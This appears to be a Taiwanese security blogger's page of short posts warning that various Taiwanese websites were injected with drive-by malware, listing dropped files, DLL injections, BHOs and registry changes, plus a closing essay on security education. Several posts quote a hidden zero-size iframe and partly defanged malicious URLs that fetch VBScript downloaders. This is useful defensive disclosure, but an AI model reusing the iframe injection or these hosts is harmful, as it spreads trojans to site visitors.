目前分類:惡意程式 (331)

瀏覽方式: 標題列表 簡短摘要
IThome首頁也被植入惡意程式,到現在尚未清除,請各位小心(FireFox不會被影響)。





home1.png

惡意程式碼是藏在一個htm檔:

code1.png

code2.png

以下是執行之後的行為:

[Dll Injection]
C:\Program Files\Common Files\wincreat.dll (注入某些執行程序如 Explorer.exe 等)

[Added Files]
C:\Documents and Settings\Administrator\Local Settings\Temp\feipeng.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\update.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\update[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\help[1].htm
C:\Program Files\Common Files\wincreat.dll
C:\WINDOWS\system32\winCreate.exe

[Added BHO]
{D14CE39F-EED3-489A-948C-FCD588F831E7}-C:\Program Files\Common Files\wincreat.dll

rogerspeaking 發表在 痞客邦 留言(3) 人氣()

▲top
IThome首頁也被植入惡意程式,到現在尚未清除,請各位小心(FireFox不會被影響)。





home1.png

惡意程式碼是藏在一個htm檔:

code1.png

code2.png

以下是執行之後的行為:

[Dll Injection]
C:\Program Files\Common Files\wincreat.dll (注入某些執行程序如 Explorer.exe 等)

[Added Files]
C:\Documents and Settings\Administrator\Local Settings\Temp\feipeng.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\update.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\update[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\help[1].htm
C:\Program Files\Common Files\wincreat.dll
C:\WINDOWS\system32\winCreate.exe

[Added BHO]
{D14CE39F-EED3-489A-948C-FCD588F831E7}-C:\Program Files\Common Files\wincreat.dll

rogerspeaking 發表在 痞客邦 留言(2) 人氣()

▲top
手機王(Sogi)又被植入惡意程式碼,到現在又未被移除,請小心。



home.png

惡意程式碼是藏在一個JS檔:

code11.png
code22.PNG

code33.PNG

以下是執行之後的行為:

[Dll Injection]

C:\WINDOWS\Debug\UserMode\3083.dll (注入某些執行程序如 Explorer.exe 等)

[Added Files]

C:\Documents and Settings\Administrator\Local Settings\Temp\s.exe

C:\logex.txt (會記錄 IE 的行為)
C:\WINDOWS\Debug\UserMode\3083.dll
C:\WINDOWS\Debug\UserMode\3083.exe

[Added BHO]

{5CEA2D14-E3C1-4EA7-BCFD-C79FC6EF28A7}-C:\WINDOWS\debug\userMode\3083.dll

-----

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

▲top
Hinet直播網首頁被植入惡意程式碼,到現在為止,尚未移除,請各位小心。



homepage

惡意程式碼是藏在一個JS檔:

viruscode

viruscode1
以下是執行之後的行為:

[Dll Injection]

C:\WINDOWS\off1win.dll (注入某些執行程序如 explorer.exe等)

[Added file]

C:\Documents and Settings\Administrator\Local Settings\Temp\AdCount.com
C:\WINDOWS\off1win.dll
C:\WINDOWS\system32\on1Exe.exe

[ Added BHO ]

{894C0068-46AC-4F59-A140-EDE0DABA776C}-C:\WINDOWS\off1win.dll

rogerspeaking 發表在 痞客邦 留言(5) 人氣()

▲top
今天我Notebook的防毒軟體說我的電腦有病毒,描述 c:\program files\winrar\winrar.exe 偵測為 W32.Fujacks.A,讓我下一跳,因為我已經好幾年沒中毒了,稍微分析這個檔案,但覺得他沒有病毒,就把相關資訊送給 Symantec,他們回答說是誤判 (false positive),請各位小心囉。



WinRAR.exe相關訊息:

File size: 835584 bytes
MD5: a0070064da2bf76b8bcc7d11e357517d
SHA1: 9978271e4e39c704d242a2b9cf15ab4b24a60439

防毒版本:Symantec NIS 2006 (12.2.0.13)
fa

response

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

▲top
77遊樂新世界首頁又被植入新惡意程式,請各位小心囉!



進入首頁之後,

home.png

有下面的行為:

[Added Process]
//執行之後,會發生應用程式錯誤

[DLL Injection]
C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.Exe
C:\WINDOWS\system32\msnfile.dll
C:\WINDOWS\winntf.dll
//上面檔案會注入某些執行程序

[Added service]
NAME: winntf
FILE: C:\WINDOWS\winntf.bat

[ Added BHO]
{F93CB274-12A2-489E-9DB6-BAAF492448D0}-C:\WINDOWS\system32\msnfile.dll

[Added file]
C:\Documents and Settings\Administrator\Local Settings\Temp\32.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\33.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.Exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\coca[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\images[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\top[1].exe
C:\mp.exe
C:\WINDOWS\system32\msnfile.dll
C:\WINDOWS\system32\msnfile.exe
C:\WINDOWS\winntf.bat
C:\WINDOWS\winntf.dll

注意:似乎下載的檔案會變化(可能檔名或檔案大小),如果這樣的話,防毒軟體就比較難偵測它們。

rogerspeaking 發表在 痞客邦 留言(2) 人氣()

▲top
中央大學遠距教學網及77遊樂新世界網頁被植入相同一隻木馬,到現在尚未修復,請各位小心。



執行之後,有下面行為:

[Added process]
C:\mp.exe

[Dll Injection]
C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.Exe
C:\WINDOWS\mcsdos32.dll
//上面兩個檔案會注入某些執行程序

[Added files]
C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.Exe
C:\mp.exe
C:\WINDOWS\loados.exe
C:\WINDOWS\mcsdos32.dll

[Added BHO]
{C1FB8488-D217-4803-B38A-C667B83F43A3}-C:\WINDOWS\mcsdos32.dll



home.png

iframe.png
home_77.png

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

▲top
數碼E社群網站(bbs.eztown.com)被植入惡意程式碼,到現在都還未修復,請各位小心。



當您連上這個網站,它會做下面的行為:

1. iframe 語法藏在 menu.js 檔案裡,
iframe.png
2. 連上 http_://www.yyc8.com/script/adcount.do?id=ad002,它會執行 code.js (Javascript 檔案),

code_js1

3. 將 rss2.css 換為 adcount.com,然後執行 adcount.com,執行後,會發生一個應用程式錯誤,

app_err
4. 新增兩各檔案 winpfile.dll 和 esnfile.exe (不太確定),

5. adcount.com 會注入某些執行程序,

dll_injection

rogerspeaking 發表在 痞客邦 留言(1) 人氣()

▲top
95年10月29日手機王首頁也被植入木馬(Lineage),分析了一下,結果如下:



1. 首頁被植入 iframe:
http://www. myemage .com/V20/Daren/images/img.html

2. img.html 是一個 VBScript,它會下載或執行 2.exe

3. 執行之後,系統產生:
[DLL Injection]
C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe 注入某些執行程序 (如svchost.exe)。
C:\WINDOWS\system32\gfile.dll 注入某些執行程序 (如explorer.exe)。

[Drop Files]
C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe
C:\WINDOWS\system32\gfile.dll
C:\WINDOWS\system32\goodfile.exe

[BHO/CLSID]
{71177AD5-E5B5-4451-A4B0-F31C521B6557}--C:\WINDOWS\system32\gfile.dll

[Added Registries]
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks||
Value={71177AD5-E5B5-4451-A4B0-F31C521B6557}

rogerspeaking 發表在 痞客邦 留言(2) 人氣()

▲top
資策會首頁(www.iiiedu.org.tw)今天被植入木馬(Lineage),到現在為止,都還未被移除,請各位小心囉。



以下是這隻木馬的行為:

1. 首頁被植入iframe
"http://www. fxkfxk .com/333/us.asp" width="0" height="0" scrolling="no" frameborder="0"

2. 檔案 us.asp 是一個 VBScript,它會下載或執行 us.exe。

3. 執行之後,系統會產生:
[Added process]
C:\WINDOWS\svchost.exe

[DLL Injection]
C:\WINDOWS\svchost.exe 注入某些執行程序,例如, svchost.exe 等等。
C:\WINDOWS\system32\PDLL.dll 注入某些執行程序,例如, svchost.exe、explorer.exe 等等。
C:\WINDOWS\winnt.dll 注入某些執行程序,例如, 瀏覽器等等。
C:\WINDOWS\winntKey.DLL 注入某些執行程序,例如, svchost.exe 等等。

[Added service]
NAME=PigeonServer
DISPLAY=PigeonServer
FILE=C:\WINDOWS\winnt.exe

[Drop Files]
C:\Program Files\WindowsUpdate\1.exe
C:\Program Files\WindowsUpdate\2.exe
C:\WINDOWS\svchost.exe
C:\WINDOWS\system32\PDLL.dll
C:\WINDOWS\winnt.dll
C:\WINDOWS\winnt.exe
C:\WINDOWS\winntKey.DLL

[Added Registries]
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon||Value=Userinit||Data=C:\WINDOWS\system32\userinit.exe,
C:\WINDOWS\svchost.exe

-----

rogerspeaking 發表在 痞客邦 留言(0) 人氣()

▲top

最近從新聞網站上看到一篇文章(安全專家:使用者資安教育是毫無意義的英文版中文版)覺得蠻有趣的,剎那間,心中燃起一股衝動想要向大家說明這個議題。到底安全專家的觀點對不對呢(他不相信使用者教育將可解決安全問題,因為安全一直都不是使用者的第一目標)


我個人覺得他的觀點不是完全正確的。如果資訊安全教育的方向是正確的,我們必須檢討我們所犯的錯誤,將它導回正軌,而不是一味地否定它。我們必須要有一個體認,教育不是一蹴可及的,是需要長期循序漸進的。

我個人對資訊安全教育的觀感:第一,資訊安全教育想要傳達的訊息是要教導使用者體認資訊安全的重要性,讓使用者有基本的資訊安全的觀念,進而降低個人或企業資產損失的風險,而不是要完全地解決安全問題,以增加使用者的負擔。舉個例子,前一陣子台灣很流行詐騙,也有很多人在不知不覺的情形中成為受害者,但經過媒體大量報導及相關單位的宣傳,相關案例已經降低很多;第二,資訊安全教育是要常態化的。很多企業花了幾天的時間教導員工資訊安全的重要,但常常是成效不彰,因為他們往往只是為了達成上級交辦的任務,為做而做,而不是真的很重視資訊安全教育。想想在台灣有哪些企業肯花大錢定期舉辦資訊安全講習呢?屈指可數,對不對?第三,資訊安全最好從小紮根。以前我們說馬路如虎口,要大家千萬要小心,現在則是網路如虎口,處處充滿危機,不提高警覺不行。面對數位化時代的來臨,很多事情無法以傳統的角度來思考,如果我們不把握時間,從小教導起,未來我們將面臨更大的挑戰。第四,高階主管不是很重視。企業的資訊安全教育如果沒有高階主管的參與及背書,基本上都是玩假的,因為每個人都是各自為政,不遵守資訊安全政策,等事情發生了,在相互推諉責任。第五,政府相關主管單位的漠視。資訊安全無法單靠個人或企業的推動即可達成,政府相關主管單位必須推動相關法案的立法,不要每次都要等到事情發生了,再做事後檢討及立法。另外,政府相關主管單位必須提撥經費,積極地推廣資訊安全教育。


使用者不重視資訊安全是很普遍的,一方面,覺得關他們什麼事,另一方面,覺得造成他們的不便。資訊安全、便利性與功能性的三角關係是互斥的,想要便利又要安全及功能性幾乎是不可能的,但科技始終來自人性(人的惰性),終究有一天科技會克服這個障礙。資訊安全是需要各位的關心及分享,而不是單打獨鬥。



rogerspeaking 發表在 痞客邦 留言(3) 人氣()

▲top
«1...151617